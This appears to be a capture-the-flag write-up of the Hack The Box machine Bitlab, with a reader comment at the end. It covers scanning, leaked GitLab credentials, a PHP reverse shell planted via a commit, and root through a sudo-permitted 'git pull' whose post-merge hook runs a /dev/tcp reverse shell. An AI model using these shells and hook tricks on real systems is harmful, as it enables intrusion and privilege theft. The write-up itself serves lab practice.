by 
Hack The Box Bitlab is a medium-difficulty Linux machine. There are a couple of ways to exploit this machine. I’m going to use the intended one. The other way involved good old OllyDBG which I honestly don’t like π
I’ve added the machine IP 10.10.10.114 to etc/ hosts as bitlab.htb. Letβs start with nmap port scan -a mandatory step to start with any machine.
Here is the nmap scan results:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
β‘ β root@ns09~/htb/bitlab nmap -p- -sT -sV -sC -oN initial-scan bitlab.htb Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-21 09:24 +03 Nmap scan report for bitlab.htb (10.10.10.114) Host is up (0.15s latency). Not shown: 65533 filtered ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA) | 256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA) |_ 256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519) 80/tcp open http nginx | http-robots.txt: 55 disallowed entries (15 shown) | / /autocomplete/users /search /api /admin /profile | /dashboard /projects/new /groups/new /groups/*/edit /users /help |_/s/ /snippets/new /snippets/*/edit | http-title: Sign in \xC2\xB7 GitLab |_Requested resource was http://bitlab.htb/users/sign_in |_http-trane-info: Problem with XML parsing of /evox/about Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 371.91 seconds β‘ β root@ns09~/htb/bitlab |
The Nginx on port 80 hots GitLab Community Edition. (A web-based DevOps lifecycle tool that provides a Git-repository manager providing wiki, issue-tracking and CI/CD pipeline features, using an open-source license. ref: Wikipedia).
As the GitLab page needs credentials to log in, I’m proceeding to find other ways to exploit. Some HTB users in the forum suggested to go GoBuster, but I found an easy way to find the directory using robots.txt. The sites robots.txt has revealed a lot of directories that disallowing search engines.
Getting The Credentials
I checked though the different directlries one by one. I found some interesting HEX withon the directory /help’s source-code:
The last part of the source-code is an encoded GitLab login script that contains user name and password. After decoding the hex using http://ddecode.com/hexdecoder/ I now have the valid username and password of the page. clave:11des0081x
Uisng the credentials I obtained, I successfully logged-in to the BitLab page. The page contains few code repositories. lets go through it.
The Good Old PHP Reverse Shell
So looking through the code repository, I noticed the user “Clave” is able to edit the profile index.php file. This is great news for me, I can make a reverse shell using the modified index.php file. For that, I need my good old friend PenTestMonkey’s PHP Reverse shell. I’m going to copy the script and modify it to add my local IP and port to call the shell back from my Kali machine.
And I replaced my reverse shell script with the GitLab’s index.php script. Then, clicked on “Commit Changes” button. I made sure my updates has been went through. I made a merge request to finsh the update.
Getting the Reverse Shell
Once the process is done, I setup my listener nc -nlvp 4444. I opened the page i just updated. (http://bitlab.htb/profile/index.php)
I’m ready to go, I have the reverse shell. However, the shell I have is www-data with low privilage, I had to run
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
β‘ β root@ns09~/htb/bitlab nc -nlvp 4444 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 10.10.10.114. Ncat: Connection from 10.10.10.114:48594. Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux 11:12:47 up 5:01, 0 users, load average: 0.10, 0.10, 0.05 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT uid=33(www-data) gid=33(www-data) groups=33(www-data) /bin/sh: 0: can't access tty; job control turned off $ python -c 'import pty;pty.spawn("/bin/bash");' www-data@bitlab:/$ |
I ran the sudo -l command to see the better visibility
|
1 2 3 4 5 6 7 8 9 10 |
www-data@bitlab:/$ sudo -l sudo -l Matching Defaults entries for www-data on bitlab: env_reset, exempt_group=sudo, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bitlab: (root) NOPASSWD: /usr/bin/git pull www-data@bitlab:/$ |
However, I wasn’t able to perform anything since I have a low privilege shell. After browsing the site for a while, I noticed that there is a snipped has a PHP code that would help me to get DB user credentials. I would need to modify the PHP code in order to achieve this.
From this:
To this:
Code:
|
1 2 3 4 5 6 7 8 |
<?php $db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles"); $result = pg_query($db_connection, "SELECT * FROM profiles"); while ($row = pg_fetch_row($result)) { var_dump($row); } ?> |
Getting the user.txt
And update my index.php and browse the page again.
I have the db password in encoded format. I’d need to decode it before I ssh the box.
string(1) “1” [1]=> string(5) “clave” [2]=> string(22) “c3NoLXN0cjBuZy1wQHNz==” }
I used kali decoder to decode the hash. The password was ssh-str0ng-p@ss
I went on ssh the box using clave as the user. I tried the password as ssh-str0ng-p@ss, unfortunately, it didn’t work, I tried the password ssh-str0ng-p@ssbase64 it didn’t work also, but it worked when I use hashed password as a password it worked. and I got the user.txt.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
β‘ root@ns09~/htb/bitlab ssh clave@10.10.10.114 The authenticity of host '10.10.10.114 (10.10.10.114)' can't be established. ECDSA key fingerprint is SHA256:hNHxoptKsWqkzdME7Bfb+cGjskcAAGySJazK+gDDCHQ. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.114' (ECDSA) to the list of known hosts. clave@10.10.10.114's password: Permission denied, please try again. clave@10.10.10.114's password: Last login: Thu Aug 8 14:40:09 2019 clave@bitlab:~$ ls RemoteConnection.exe user.txt clave@bitlab:~$ cat user.txt 1e3f[------------]8154 clave@bitlab:~$ |
Privilege escalation
From my previous reverse shell, I will
|
1 2 3 |
User www-data may run the following commands on bitlab: (root) NOPASSWD: /usr/bin/git pull |
I ran the following commands:
|
1 2 3 4 5 |
$ cd /tmp $ mkdir nav1n $ cd nav1n $ cp -rf /var/www/html/profile . $ cd profile |
After the copying is done, my next step is to create a hook called post-merge which will be executed once the code has been pulled in to nav1n directory. Also, I need to change the directory permission to executable with chmod +x.
Here are the commands I ran.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
$ echo "#!/bin/bash" > .git/hooks/post-merge $ echo "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1" >> .git/hooks/post-merge $ chmod +x .git/hooks/post-merge $ ls -alh .git/hooks total 60K drwxr-xr-x 2 www-data www-data 4.0K Nov 21 12:38 . drwxr-xr-x 8 www-data www-data 4.0K Nov 21 12:39 .. -rwxr-xr-x 1 www-data www-data 478 Nov 21 12:38 applypatch-msg.sample -rwxr-xr-x 1 www-data www-data 896 Nov 21 12:38 commit-msg.sample -rwxr-xr-x 1 www-data www-data 3.3K Nov 21 12:38 fsmonitor-watchman.sample -rwxrwxrwx 1 www-data www-data 53 Nov 21 12:42 post-merge -rwxr-xr-x 1 www-data www-data 189 Nov 21 12:38 post-update.sample -rwxr-xr-x 1 www-data www-data 424 Nov 21 12:38 pre-applypatch.sample -rwxr-xr-x 1 www-data www-data 1.7K Nov 21 12:38 pre-commit.sample -rwxr-xr-x 1 www-data www-data 1.4K Nov 21 12:38 pre-push.sample -rwxr-xr-x 1 www-data www-data 4.8K Nov 21 12:38 pre-rebase.sample -rwxr-xr-x 1 www-data www-data 544 Nov 21 12:38 pre-receive.sample -rwxr-xr-x 1 www-data www-data 1.5K Nov 21 12:38 prepare-commit-msg.sample -rwxr-xr-x 1 www-data www-data 3.6K Nov 21 12:38 update.sample $ cat .git/hooks/post-merge #!/bin/bash bash -i >& /dev/tcp/10.10.14.9/4444 0>&1 $ sudo git pull From ssh://localhost:3022/root/profile master -> origin/master * [new branch] patch-2603 -> origin/patch-2603 Updating ccf9eff..6c6f8a7 Fast-forward index.php | 2 +- 1 file changed, 2 insertions(+), 0 deletions(-) |
In the meantime I ran a listener on the port 6666 in another terminal.
|
1 2 3 4 5 6 7 8 9 10 11 |
β‘root@ns09~/htb/bitlab nc -nlvp 6666 Ncat: Version 7.80 ( https://nmap.org/ncat ) Ncat: Listening on :::6666 Ncat: Listening on 0.0.0.0:6666 Connection received on 10.10.10.114 36176 bash: cannot set terminal process group (1122): Inappropriate ioctl for device bash: no job control in this shell root@bitlab:/tmp/nav1n/profile# cat /root/root.txt cat /root/root.txt 8d4c[--------------]d587c |
Very nice writeup, i didnβt even realise RemoteConnection.exe was the intended solution! like you i always run sudo -l once i get a reverse shell and immediately expected the git pull to be the intended way of getting root π git has so called hooks that get executed before or after certain actions. a git pull triggers the pre-commit trigger i exploited this by setting up a git remote on my own laptop, clone it from the gitlab box, add the bash script i want run as root inside the repo directory at .git/hooks/pre-commit, added a commit on my laptop… Read more »